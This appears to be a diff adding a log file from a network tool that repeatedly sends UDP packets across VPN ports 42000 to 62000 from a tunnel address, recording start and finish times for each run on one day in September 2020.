+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:13:05 +Starting port fill at 2020-09-06 13:14:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:14:05 +Starting port fill at 2020-09-06 13:15:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:15:06 +Starting port fill at 2020-09-06 13:16:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:16:05 +Starting port fill at 2020-09-06 13:17:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:17:05 +Starting port fill at 2020-09-06 13:18:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:18:05 +Starting port fill at 2020-09-06 13:19:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:19:05 +Starting port fill at 2020-09-06 13:20:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:20:05 +Starting port fill at 2020-09-06 13:21:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:21:06 +Starting port fill at 2020-09-06 13:22:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:22:04 +Starting port fill at 2020-09-06 13:23:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:23:04 +Starting port fill at 2020-09-06 13:24:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:24:04 +Starting port fill at 2020-09-06 13:25:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:25:04 +Starting port fill at 2020-09-06 13:26:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 13:26:06 +Starting port fill at 2020-09-06 13:27:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:27:04 +Starting port fill at 2020-09-06 13:28:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:28:04 +Starting port fill at 2020-09-06 13:29:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:29:04 +Starting port fill at 2020-09-06 13:30:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:30:04 +Starting port fill at 2020-09-06 13:31:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:31:04 +Starting port fill at 2020-09-06 13:32:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:32:06 +Starting port fill at 2020-09-06 13:33:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:33:04 +Starting port fill at 2020-09-06 13:34:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:34:05 +Starting port fill at 2020-09-06 13:35:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 